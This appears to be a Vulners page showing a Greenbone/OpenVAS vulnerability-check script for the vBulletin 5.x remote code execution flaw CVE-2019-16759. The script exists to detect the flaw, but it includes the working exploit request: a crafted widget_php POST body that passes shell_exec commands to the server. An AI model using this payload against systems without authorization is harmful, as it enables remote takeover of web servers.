vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability - Active Check
🗓️ 25 Sep 2019 00:00:00Reported by Copyright (C) 2019 Greenbone AGType
openvas🔗 plugins.openvas.org👁 55 Views
| Reporter | Title | Published | Views | Family All 82 |
|---|---|---|---|---|
| vBulletin 5.x - Remote Command Execution Exploit | 1 Oct 201900:00 | – | zdt | |
| vBulletin 5.5.4 Remote Command Execution Exploit #RCE | 11 Dec 201900:00 | – | zdt | |
| vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| vBulletin 5.x Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:56 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 12 Oct 201918:51 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 24 Aug 202016:15 | – | githubexploit | |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:27 | – | githubexploit |
10
# SPDX-FileCopyrightText: 2019 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:vbulletin:vbulletin";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.142932");
script_version("2025-05-29T05:40:25+0000");
script_tag(name:"last_modification", value:"2025-05-29 05:40:25 +0000 (Thu, 29 May 2025)");
script_tag(name:"creation_date", value:"2019-09-25 04:05:17 +0000 (Wed, 25 Sep 2019)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2020-08-19 18:58:00 +0000 (Wed, 19 Aug 2020)");
script_cve_id("CVE-2019-16759");
script_tag(name:"qod_type", value:"exploit");
script_name("vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability - Active Check");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2019 Greenbone AG");
script_family("Web application abuses");
script_dependencies("vbulletin_http_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("vbulletin/http/detected");
script_tag(name:"summary", value:"vBulletin is prone to an unauthenticated remote code execution
(RCE) vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response.");
script_tag(name:"impact", value:"An unauthenticated attacker may execute arbitrary code on the
system as the user running vBulletin.");
script_tag(name:"affected", value:"vBulletin versions 5.x before 5.5.2 Patch Level 1, 5.5.3 before
5.5.3 Patch Level 1 and 5.5.4 before 5.5.4 Patch Level 1.");
script_tag(name:"solution", value:"Update to 5.5.2 Patch Level 1, 5.5.3 Patch Level 1, 5.5.4 Patch
Level 1 or later. Please see the referenced vendor advisory for more information.");
script_xref(name:"URL", value:"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4");
script_xref(name:"URL", value:"https://seclists.org/fulldisclosure/2019/Sep/31");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("list_array_func.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
url = dir + "/";
headers = make_array("Content-Type", "application/x-www-form-urlencoded");
vt_strings = get_vt_strings();
cmds = exploit_commands();
foreach pattern(keys(cmds)) {
cmd = cmds[pattern];
final_checks[pattern] = "shell_exec%28%27" + cmd;
}
# nb: shell_exec might be disabled so use bin2hex in addition to it.
final_checks[vt_strings["default_rand_hex"]] = "bin2hex%28%27" + vt_strings["default_rand"];
foreach pattern(keys(final_checks)) {
cmd = final_checks[pattern];
data = "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+" + cmd + "%27%29%3B+exit%3B";
req = http_post_put_req(port: port, url: url, data: data, add_headers: headers);
res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);
if (egrep(pattern: pattern, string: res)) {
info['1. "HTTP POST" body'] = data;
info['2. URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );
info['3. Used command'] = cmd;
info['4. Expected result'] = pattern;
report = 'By doing the following request:\n\n';
report += text_format_table(array: info) + '\n\n';
report += 'it was possible to execute a command on the target.';
report += '\n\nResult: ' + res;
security_message(port: port, data: report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2025 00:00Current
10High risk
Vulners AI Score10
CVSS 27.5
CVSS 3.19.8
EPSS0.99728
SSVC